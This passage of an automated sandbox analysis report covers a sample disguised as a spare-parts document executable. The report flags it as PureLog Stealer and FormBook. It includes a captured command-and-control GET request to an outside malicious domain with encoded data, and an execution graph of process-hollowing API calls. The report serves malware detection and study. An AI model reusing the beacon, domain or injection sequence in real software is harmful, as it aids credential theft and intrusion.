                                                            Data Raw: 42 7a 49 30 70 52 3d 72 34 72 4b 63 69 62 56 53 78 34 76 54 67 42 5a 4e 7a 70 61 4b 49 4c 73 56 68 4e 47 72 4d 2b 4b 2f 50 4c 7a 76 71 49 4e 41 78 4d 75 50 71 61 34 4f 6c 44 68 47 33 70 6e 37 61 33 62 69 76 53 36 49 4d 74 74 56 45 73 44 72 6b 35 34 65 4c 70 7a 51 6a 72 69 56 33 2b 45 6f 56 4f 2f 6a 65 56 59 32 59 4f 51 58 72 5a 34 61 52 2f 59 77 64 38 49 33 4e 4a 2b 4f 4f 32 71 64 53 71 49 66 42 73 42 64 76 76 4f 38 56 48 75 55 6a 65 56 39 74 41 37 54 2f 63 62 70 30 79 30 74 58 75 74 49 66 77 67 6f 32 2f 61 31 36 33 6f 57 51 74 56 47 54 70 6a 68 49 65 2b 78 4e 6b 36 55 65 78 44 31 44 4a 5a 2b 47 63 7a 54 65 31 47 7a 78 59 31 51 62 55 4b 68 67 69 4c 71 4b 6b 45 53 6b 7a 63 72 34 37 53 70 76 79 41 30 4a 45 6e 71 4e 2f 6a 78 47 66 73 41 35 58 39 38 5a 51 75 4e 72 6f 4f 76 6d 37 31 45 50 4e 55 43 77 52 34 71 63 4a 74 4a 30 2f 69 37 68 34 32 46 43 42 4e 74 7a 54 63 78 2f 58 77 70 70 79 56 76 4c 61 66 74 65 59 65 70 69 6a 50 65 68 36 39 53 66 75 36 6d 42 6e 37 43 34 70 58 73 54 79 74 50 4f 70 78 57 36 4a [TRUNCATED]
                                                            Data Ascii: BzI0pR=r4rKcibVSx4vTgBZNzpaKILsVhNGrM+K/PLzvqINAxMuPqa4OlDhG3pn7a3bivS6IMttVEsDrk54eLpzQjriV3+EoVO/jeVY2YOQXrZ4aR/Ywd8I3NJ+OO2qdSqIfBsBdvvO8VHuUjeV9tA7T/cbp0y0tXutIfwgo2/a163oWQtVGTpjhIe+xNk6UexD1DJZ+GczTe1GzxY1QbUKhgiLqKkESkzcr47SpvyA0JEnqN/jxGfsA5X98ZQuNroOvm71EPNUCwR4qcJtJ0/i7h42FCBNtzTcx/XwppyVvLafteYepijPeh69Sfu6mBn7C4pXsTytPOpxW6Jzog6zWptYDL6Bet4o4SVbmbjWnX2CTlHtQ0cFCwzG0/2OMg8MsyWFJ+mIQa3VWwWIJ2Yv1GqCI5IVsd7ep8he4G2XKPsCNpb0SSxXQV/OCxEsTRpEr7XVt2SDez3AZRG5xA64kfbllKGGAlO08cU5I9MM56q15C3O4B0ZiX+8P230Yd7d9IMThAkPqerjIWli02qvEDalvwBg/rcavTI83pYFlj9GLvPe81VFZ/GVDhbp738LB5llS5uP0PqJ5MTbd+/PY0fMavd7iAzlfVDMFQW9fIkLZU/T/qwYbRXrClbeP/pXupf/KmgTUSaS6yPGljwjOmt+FHFuXj694953ik7FD+fcBGb8YnjigvMH5yByUeLA+uMzZR+xkWRFOF8tXeahm/3K7dvgELom8OOvjpP0/BEoAgNO7n9PUwB7s/LuQSS/Hgrm/wnPqn2/mYgmi6vpMTf7u+7NENJMzlERepOJWhpHrA8Jd0CmLdILZEYRAggSZphaZzHXwaCtrDcmSOjGnvrs4nfrgReLCD+hqhImMVr0kQETznnflZjtID5z8R9HqolXreJFk+vGBTR9lw6v7MhPw+OsZWS8mAOofJ8tymv76QLfaqIByETFRZEhXTKyrxTfCzd18PqhbOqL7BVGi6qNxmQ6ah/IggummmsFw5fihB8jz [TRUNCATED]


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.94997213.228.81.39806784C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 25, 2024 10:51:54.332039118 CET543OUTGET /y49d/?Ap=KZH8jfU0&BzI0pR=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDzO8C+ujqQcrInydaZ/WyC6o7IBrA== HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.taxiquynhonnew.click
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Nov 25, 2024 10:51:55.961998940 CET507INHTTP/1.1 301 Moved Permanently
                                                            Server: openresty
                                                            Date: Mon, 25 Nov 2024 09:51:55 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Location: https://www.taxiquynhonnew.click/y49d/?Ap=KZH8jfU0&BzI0pR=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDzO8C+ujqQcrInydaZ/WyC6o7IBrA==
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:04:49:57
                                                            Start date:25/11/2024
                                                            Path:C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe"
                                                            Imagebase:0xa30000
                                                            File size:765'952 bytes
                                                            MD5 hash:77F595058C6627BF075A7283B57E1C5D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1391242614.0000000007480000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1389196693.0000000004001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:3
                                                            Start time:04:50:01
                                                            Start date:25/11/2024
                                                            Path:C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe"
                                                            Imagebase:0x3c0000
                                                            File size:765'952 bytes
                                                            MD5 hash:77F595058C6627BF075A7283B57E1C5D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:4
                                                            Start time:04:50:01
                                                            Start date:25/11/2024
                                                            Path:C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe"
                                                            Imagebase:0x530000
                                                            File size:765'952 bytes
                                                            MD5 hash:77F595058C6627BF075A7283B57E1C5D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1938558348.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1937882646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1939504326.00000000014B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:6
                                                            Start time:04:50:50
                                                            Start date:25/11/2024
                                                            Path:C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe"
                                                            Imagebase:0x440000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2603358231.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            General

                                                            Target ID:9
                                                            Start time:04:50:52
                                                            Start date:25/11/2024
                                                            Path:C:\Windows\SysWOW64\tzutil.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\SysWOW64\tzutil.exe"
                                                            Imagebase:0xfe0000
                                                            File size:48'640 bytes
                                                            MD5 hash:31DE852CCF7CED517CC79596C76126B4
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2603137890.0000000000F70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2603506691.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:moderate
                                                            Has exited:false

                                                            General

                                                            Target ID:10
                                                            Start time:04:51:05
                                                            Start date:25/11/2024
                                                            Path:C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe"
                                                            Imagebase:0x440000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2602984671.0000000001060000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            General

                                                            Target ID:12
                                                            Start time:04:51:17
                                                            Start date:25/11/2024
                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                            Imagebase:0x7ff73feb0000
                                                            File size:676'768 bytes
                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:11.1%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:3.2%
                                                              Total number of Nodes:312
                                                              Total number of Limit Nodes:22
                                                              execution_graph 25475 73105c0 25476 73105e8 25475->25476 25477 73105de 25475->25477 25480 7310613 25477->25480 25485 7310628 25477->25485 25481 7310633 25480->25481 25491 73107a0 CloseHandle 25481->25491 25493 7310798 25481->25493 25482 7310651 25482->25476 25486 7310636 25485->25486 25488 7310655 25485->25488 25489 73107a0 CloseHandle 25486->25489 25490 7310798 CloseHandle 25486->25490 25487 7310651 25487->25476 25488->25476 25489->25487 25490->25487 25492 7310807 25491->25492 25492->25482 25494 73107a0 CloseHandle 25493->25494 25495 7310807 25494->25495 25495->25482 25203 2dbd418 25204 2dbd45e 25203->25204 25208 2dbd5e9 25204->25208 25211 2dbd5f8 25204->25211 25205 2dbd54b 25210 2dbd626 25208->25210 25214 2dbb770 25208->25214 25210->25205 25212 2dbb770 DuplicateHandle 25211->25212 25213 2dbd626 25212->25213 25213->25205 25215 2dbd660 DuplicateHandle 25214->25215 25216 2dbd6f6 25215->25216 25216->25210 25496 2db4668 25497 2db467a 25496->25497 25498 2db4686 25497->25498 25502 2db4778 25497->25502 25507 2db3e34 25498->25507 25500 2db46a5 25503 2db479d 25502->25503 25511 2db4879 25503->25511 25515 2db4888 25503->25515 25508 2db3e3f 25507->25508 25523 2db5c64 25508->25523 25510 2db6ff7 25510->25500 25513 2db48af 25511->25513 25512 2db498c 25512->25512 25513->25512 25519 2db44b4 25513->25519 25516 2db48af 25515->25516 25517 2db44b4 CreateActCtxA 25516->25517 25518 2db498c 25516->25518 25517->25518 25520 2db5918 CreateActCtxA 25519->25520 25522 2db59cf 25520->25522 25524 2db5c6f 25523->25524 25527 2db5c84 25524->25527 25526 2db70c5 25526->25510 25528 2db5c8f 25527->25528 25531 2db5cb4 25528->25531 25530 2db71a2 25530->25526 25532 2db5cbf 25531->25532 25535 2db5ce4 25532->25535 25534 2db72a5 25534->25530 25536 2db5cef 25535->25536 25538 2db85ab 25536->25538 25542 2dbac58 25536->25542 25537 2db85e9 25537->25534 25538->25537 25546 2dbcd40 25538->25546 25551 2dbcd50 25538->25551 25556 2dbac7f 25542->25556 25561 2dbac90 25542->25561 25543 2dbac6e 25543->25538 25547 2dbcd71 25546->25547 25548 2dbcd95 25547->25548 25575 2dbcef1 25547->25575 25579 2dbcf00 25547->25579 25548->25537 25553 2dbcd71 25551->25553 25552 2dbcd95 25552->25537 25553->25552 25554 2dbcef1 2 API calls 25553->25554 25555 2dbcf00 2 API calls 25553->25555 25554->25552 25555->25552 25557 2dbac90 25556->25557 25565 2dbad79 25557->25565 25570 2dbad88 25557->25570 25558 2dbac9f 25558->25543 25563 2dbad79 GetModuleHandleW 25561->25563 25564 2dbad88 GetModuleHandleW 25561->25564 25562 2dbac9f 25562->25543 25563->25562 25564->25562 25566 2dbadbc 25565->25566 25567 2dbad99 25565->25567 25566->25558 25567->25566 25568 2dbafc0 GetModuleHandleW 25567->25568 25569 2dbafed 25568->25569 25569->25558 25571 2dbadbc 25570->25571 25572 2dbad99 25570->25572 25571->25558 25572->25571 25573 2dbafc0 GetModuleHandleW 25572->25573 25574 2dbafed 25573->25574 25574->25558 25576 2dbcf0d 25575->25576 25577 2dbcf47 25576->25577 25583 2dbb760 25576->25583 25577->25548 25581 2dbcf0d 25579->25581 25580 2dbb760 2 API calls 25582 2dbcf47 25580->25582 25581->25580 25581->25582 25582->25548 25584 2dbb76b 25583->25584 25586 2dbdc58 25584->25586 25587 2dbd064 25584->25587 25586->25586 25588 2dbd06f 25587->25588 25589 2db5ce4 2 API calls 25588->25589 25590 2dbdcc7 25589->25590 25590->25586 25217 722df68 25218 722e0f3 25217->25218 25220 722df8e 25217->25220 25220->25218 25221 72287b8 25220->25221 25222 722e1e8 PostMessageW 25221->25222 25223 722e254 25222->25223 25223->25220 25224 722c62c 25225 722c636 25224->25225 25226 722c327 25224->25226 25227 722c337 25226->25227 25231 722cc08 25226->25231 25254 722ccbe 25226->25254 25278 722cc18 25226->25278 25232 722cc32 25231->25232 25301 722d797 25232->25301 25306 722d357 25232->25306 25311 722d2cd 25232->25311 25318 722d84e 25232->25318 25323 722d50b 25232->25323 25328 722d90a 25232->25328 25333 722d924 25232->25333 25338 722d227 25232->25338 25346 722d087 25232->25346 25356 722d206 25232->25356 25361 722d326 25232->25361 25369 722d0e6 25232->25369 25378 722d581 25232->25378 25382 722d261 25232->25382 25392 722d303 25232->25392 25397 722d33d 25232->25397 25402 722d67d 25232->25402 25407 722d8b9 25232->25407 25412 722d538 25232->25412 25417 722cfb8 25232->25417 25233 722cc56 25233->25227 25255 722cc4c 25254->25255 25257 722ccc1 25254->25257 25256 722cc56 25255->25256 25258 722d303 2 API calls 25255->25258 25259 722d261 4 API calls 25255->25259 25260 722d581 2 API calls 25255->25260 25261 722d0e6 4 API calls 25255->25261 25262 722d326 4 API calls 25255->25262 25263 722d206 2 API calls 25255->25263 25264 722d087 4 API calls 25255->25264 25265 722d227 2 API calls 25255->25265 25266 722d924 2 API calls 25255->25266 25267 722d90a 2 API calls 25255->25267 25268 722d50b 2 API calls 25255->25268 25269 722d84e 2 API calls 25255->25269 25270 722d2cd 4 API calls 25255->25270 25271 722d357 2 API calls 25255->25271 25272 722d797 2 API calls 25255->25272 25273 722cfb8 4 API calls 25255->25273 25274 722d538 2 API calls 25255->25274 25275 722d8b9 2 API calls 25255->25275 25276 722d67d 2 API calls 25255->25276 25277 722d33d 2 API calls 25255->25277 25256->25227 25257->25227 25258->25256 25259->25256 25260->25256 25261->25256 25262->25256 25263->25256 25264->25256 25265->25256 25266->25256 25267->25256 25268->25256 25269->25256 25270->25256 25271->25256 25272->25256 25273->25256 25274->25256 25275->25256 25276->25256 25277->25256 25279 722cc32 25278->25279 25281 722d303 2 API calls 25279->25281 25282 722d261 4 API calls 25279->25282 25283 722d581 2 API calls 25279->25283 25284 722d0e6 4 API calls 25279->25284 25285 722d326 4 API calls 25279->25285 25286 722d206 2 API calls 25279->25286 25287 722d087 4 API calls 25279->25287 25288 722d227 2 API calls 25279->25288 25289 722d924 2 API calls 25279->25289 25290 722d90a 2 API calls 25279->25290 25291 722d50b 2 API calls 25279->25291 25292 722d84e 2 API calls 25279->25292 25293 722d2cd 4 API calls 25279->25293 25294 722d357 2 API calls 25279->25294 25295 722d797 2 API calls 25279->25295 25296 722cfb8 4 API calls 25279->25296 25297 722d538 2 API calls 25279->25297 25298 722d8b9 2 API calls 25279->25298 25299 722d67d 2 API calls 25279->25299 25300 722d33d 2 API calls 25279->25300 25280 722cc56 25280->25227 25281->25280 25282->25280 25283->25280 25284->25280 25285->25280 25286->25280 25287->25280 25288->25280 25289->25280 25290->25280 25291->25280 25292->25280 25293->25280 25294->25280 25295->25280 25296->25280 25297->25280 25298->25280 25299->25280 25300->25280 25302 722d20f 25301->25302 25302->25301 25303 722d6f2 25302->25303 25427 722bb90 25302->25427 25431 722bb98 25302->25431 25307 722d2a5 25306->25307 25435 722ba00 25307->25435 25439 722b9f9 25307->25439 25308 722dbc7 25314 722ba00 Wow64SetThreadContext 25311->25314 25315 722b9f9 Wow64SetThreadContext 25311->25315 25312 722d2e7 25443 722b510 25312->25443 25447 722b518 25312->25447 25313 722d87a 25313->25313 25314->25312 25315->25312 25319 722d854 25318->25319 25321 722b510 ResumeThread 25319->25321 25322 722b518 ResumeThread 25319->25322 25320 722d87a 25321->25320 25322->25320 25324 722d79c 25323->25324 25451 722bad1 25324->25451 25455 722bad8 25324->25455 25325 722d7ba 25329 722d910 25328->25329 25331 722ba00 Wow64SetThreadContext 25329->25331 25332 722b9f9 Wow64SetThreadContext 25329->25332 25330 722dbc7 25331->25330 25332->25330 25334 722d92d 25333->25334 25336 722bb90 WriteProcessMemory 25334->25336 25337 722bb98 WriteProcessMemory 25334->25337 25335 722d9c3 25336->25335 25337->25335 25339 722d239 25338->25339 25340 722d20f 25339->25340 25342 722bb90 WriteProcessMemory 25339->25342 25343 722bb98 WriteProcessMemory 25339->25343 25341 722d6f2 25340->25341 25344 722bb90 WriteProcessMemory 25340->25344 25345 722bb98 WriteProcessMemory 25340->25345 25342->25340 25343->25340 25344->25340 25345->25340 25348 722d0a1 25346->25348 25347 722d17d 25347->25233 25348->25347 25459 722be20 25348->25459 25463 722be14 25348->25463 25349 722d523 25349->25233 25350 722d1e7 25350->25349 25352 722ba00 Wow64SetThreadContext 25350->25352 25353 722b9f9 Wow64SetThreadContext 25350->25353 25351 722dbc7 25352->25351 25353->25351 25357 722d20f 25356->25357 25358 722d6f2 25357->25358 25359 722bb90 WriteProcessMemory 25357->25359 25360 722bb98 WriteProcessMemory 25357->25360 25359->25357 25360->25357 25362 722d2cc 25361->25362 25367 722ba00 Wow64SetThreadContext 25362->25367 25368 722b9f9 Wow64SetThreadContext 25362->25368 25363 722d2e7 25365 722b510 ResumeThread 25363->25365 25366 722b518 ResumeThread 25363->25366 25364 722d87a 25365->25364 25366->25364 25367->25363 25368->25363 25370 722d0f6 25369->25370 25376 722be20 CreateProcessA 25370->25376 25377 722be14 CreateProcessA 25370->25377 25371 722d523 25371->25233 25372 722d1e7 25372->25371 25374 722ba00 Wow64SetThreadContext 25372->25374 25375 722b9f9 Wow64SetThreadContext 25372->25375 25373 722dbc7 25374->25373 25375->25373 25376->25372 25377->25372 25467 722bc80 25378->25467 25471 722bc88 25378->25471 25379 722d5b5 25383 722d29f 25382->25383 25384 722d271 25382->25384 25390 722b510 ResumeThread 25383->25390 25391 722b518 ResumeThread 25383->25391 25384->25383 25386 722d20f 25384->25386 25385 722d87a 25387 722d6f2 25386->25387 25388 722bb90 WriteProcessMemory 25386->25388 25389 722bb98 WriteProcessMemory 25386->25389 25388->25386 25389->25386 25390->25385 25391->25385 25393 722d20f 25392->25393 25394 722d6f2 25393->25394 25395 722bb90 WriteProcessMemory 25393->25395 25396 722bb98 WriteProcessMemory 25393->25396 25395->25393 25396->25393 25398 722d343 25397->25398 25400 722b510 ResumeThread 25398->25400 25401 722b518 ResumeThread 25398->25401 25399 722d87a 25400->25399 25401->25399 25404 722d20f 25402->25404 25403 722d6f2 25404->25403 25405 722bb90 WriteProcessMemory 25404->25405 25406 722bb98 WriteProcessMemory 25404->25406 25405->25404 25406->25404 25408 722d8c1 25407->25408 25410 722ba00 Wow64SetThreadContext 25408->25410 25411 722b9f9 Wow64SetThreadContext 25408->25411 25409 722dbc7 25410->25409 25411->25409 25413 722d553 25412->25413 25415 722b510 ResumeThread 25413->25415 25416 722b518 ResumeThread 25413->25416 25414 722d87a 25415->25414 25416->25414 25419 722cffb 25417->25419 25418 722d17d 25418->25233 25419->25418 25425 722be20 CreateProcessA 25419->25425 25426 722be14 CreateProcessA 25419->25426 25420 722d523 25420->25233 25421 722d1e7 25421->25420 25423 722ba00 Wow64SetThreadContext 25421->25423 25424 722b9f9 Wow64SetThreadContext 25421->25424 25422 722dbc7 25423->25422 25424->25422 25425->25421 25426->25421 25428 722bb98 WriteProcessMemory 25427->25428 25430 722bc37 25428->25430 25430->25302 25432 722bbe0 WriteProcessMemory 25431->25432 25434 722bc37 25432->25434 25434->25302 25436 722ba45 Wow64SetThreadContext 25435->25436 25438 722ba8d 25436->25438 25438->25308 25440 722b9fe Wow64SetThreadContext 25439->25440 25442 722ba8d 25440->25442 25442->25308 25444 722b518 ResumeThread 25443->25444 25446 722b589 25444->25446 25446->25313 25448 722b558 ResumeThread 25447->25448 25450 722b589 25448->25450 25450->25313 25452 722bad8 VirtualAllocEx 25451->25452 25454 722bb55 25452->25454 25454->25325 25456 722bb18 VirtualAllocEx 25455->25456 25458 722bb55 25456->25458 25458->25325 25460 722bea9 25459->25460 25460->25460 25461 722c00e CreateProcessA 25460->25461 25462 722c06b 25461->25462 25464 722be20 CreateProcessA 25463->25464 25466 722c06b 25464->25466 25468 722bc88 ReadProcessMemory 25467->25468 25470 722bd17 25468->25470 25470->25379 25472 722bcd3 ReadProcessMemory 25471->25472 25474 722bd17 25472->25474 25474->25379

                                                              Executed Functions

                                                              Function 0722EEA0 Relevance: .6, Instructions: 631COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1391041247.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7220000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1797dd8bcaba8a32eab9170080102687e9e6432ebdc9cb5c92d936fce8675cc3
                                                              • Instruction ID: b8eaa9c19860de7ca5effdab09fd499717d4f7262b8026ca5725710f885805e8
                                                              • Opcode Fuzzy Hash: 1797dd8bcaba8a32eab9170080102687e9e6432ebdc9cb5c92d936fce8675cc3
                                                              • Instruction Fuzzy Hash: 7232DCB1B11215AFDB19DBA5C560BAEB7F6EF88300F204469E5069B3A0CB30DD02CB61
                                                              Function 0722CFB8 Relevance: .2, Instructions: 222COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1391041247.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7220000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1c9682990493ee3870eff9a2cffa9e4a1bd054d6c0ddd9cd6247d2255f5e9902
                                                              • Instruction ID: 343417ae5d42ab370f2fac355a71cd2ee0af78dae4a6c0918de22dc40bc25fcd
                                                              • Opcode Fuzzy Hash: 1c9682990493ee3870eff9a2cffa9e4a1bd054d6c0ddd9cd6247d2255f5e9902
                                                              • Instruction Fuzzy Hash: 189159B5E24228DFDB24CF65C8447E9B7B6BF8A300F14D0AAC40CA7251DB749A86DF40
                                                              Function 0722BE14 Relevance: 1.7, APIs: 1, Instructions: 248processCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 722be14-722beb5 3 722beb7-722bec1 0->3 4 722beee-722bf0e 0->4 3->4 5 722bec3-722bec5 3->5 9 722bf10-722bf1a 4->9 10 722bf47-722bf76 4->10 7 722bec7-722bed1 5->7 8 722bee8-722beeb 5->8 11 722bed3 7->11 12 722bed5-722bee4 7->12 8->4 9->10 13 722bf1c-722bf1e 9->13 20 722bf78-722bf82 10->20 21 722bfaf-722c069 CreateProcessA 10->21 11->12 12->12 14 722bee6 12->14 15 722bf20-722bf2a 13->15 16 722bf41-722bf44 13->16 14->8 18 722bf2e-722bf3d 15->18 19 722bf2c 15->19 16->10 18->18 22 722bf3f 18->22 19->18 20->21 23 722bf84-722bf86 20->23 32 722c072-722c0f8 21->32 33 722c06b-722c071 21->33 22->16 25 722bf88-722bf92 23->25 26 722bfa9-722bfac 23->26 27 722bf96-722bfa5 25->27 28 722bf94 25->28 26->21 27->27 29 722bfa7 27->29 28->27 29->26 43 722c0fa-722c0fe 32->43 44 722c108-722c10c 32->44 33->32 43->44 45 722c100 43->45 46 722c10e-722c112 44->46 47 722c11c-722c120 44->47 45->44 46->47 50 722c114 46->50 48 722c122-722c126 47->48 49 722c130-722c134 47->49 48->49 51 722c128 48->51 52 722c146-722c14d 49->52 53 722c136-722c13c 49->53 50->47 51->49 54 722c164 52->54 55 722c14f-722c15e 52->55 53->52 57 722c165 54->57 55->54 57->57
                                                              APIs
                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0722C056
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1391041247.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7220000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 20fa2d9effad606687560469b621f6a7aef90c8a84b612e4a385d156542d6ce0
                                                              • Instruction ID: cc538685f7310e40e6b512813f40464f61168ee0a88b7eaa3e5d5745d96c3595
                                                              • Opcode Fuzzy Hash: 20fa2d9effad606687560469b621f6a7aef90c8a84b612e4a385d156542d6ce0
                                                              • Instruction Fuzzy Hash: 6AA15CB1D1036ADFEB24CF68C8417EDBBB6BF48310F148169E818A7240DB759986DF91
                                                              Function 0722BE20 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

